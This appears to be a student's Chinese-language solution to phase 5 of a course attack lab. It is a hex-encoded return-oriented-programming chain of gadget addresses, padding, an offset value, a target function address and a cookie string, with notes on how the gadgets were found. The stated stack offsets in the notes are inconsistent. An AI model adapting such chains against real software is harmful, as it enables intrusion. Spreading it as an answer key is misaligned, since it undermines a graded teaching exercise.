答案之一:
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
06 1a 40 00 /* 1 <addval_190> movq %rsp,%rax */
00 00 00 00
a2 19 40 00 /* 2 <addval_273> movq %rax,%rdi */
00 00 00 00
ab 19 40 00 /* 3 <addval_219> popq %rax */
00 00 00 00
48 00 00 00 /* bias */
00 00 00 00
dd 19 40 00 /* 4 <getval_481> movl %eax,%edx */
00 00 00 00
69 1a 40 00 /* 5 <getval_311> movl %edx,%ecx */
00 00 00 00
13 1a 40 00 /* 6 <addval_436> movl %ecx,%esi */
00 00 00 00
d6 19 40 00 /* 7 <add_xy> lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* 8 <addval_273> movq %rax,%rdi */
00 00 00 00
fa 18 40 00 /* address of function touch3 */
00 00 00 00
35 39 62 39 /* cockie string */
39 37 66 61
00
總結一下步驟:
1. 反彙編,把彙編代碼拷貝到IDE中
2. 搜索指令關鍵字,找出所有能夠使用的代碼片段,並記錄在紙上
3. 考慮指令的相互組合,分析破解方法。可以發現,有關rsp的語句和popq的語句很少,而它們又必不可少,由此找到突破口
4. 先按順序寫好指令,再計算bias。這裏的計算非常容易出錯,要注意把%rsp拷貝給%rax的時候,%rsp已經比原來增加了0x28+0x8(0x40是程序分配的字符串緩衝區大小,0x8是執行一次ret後的效果)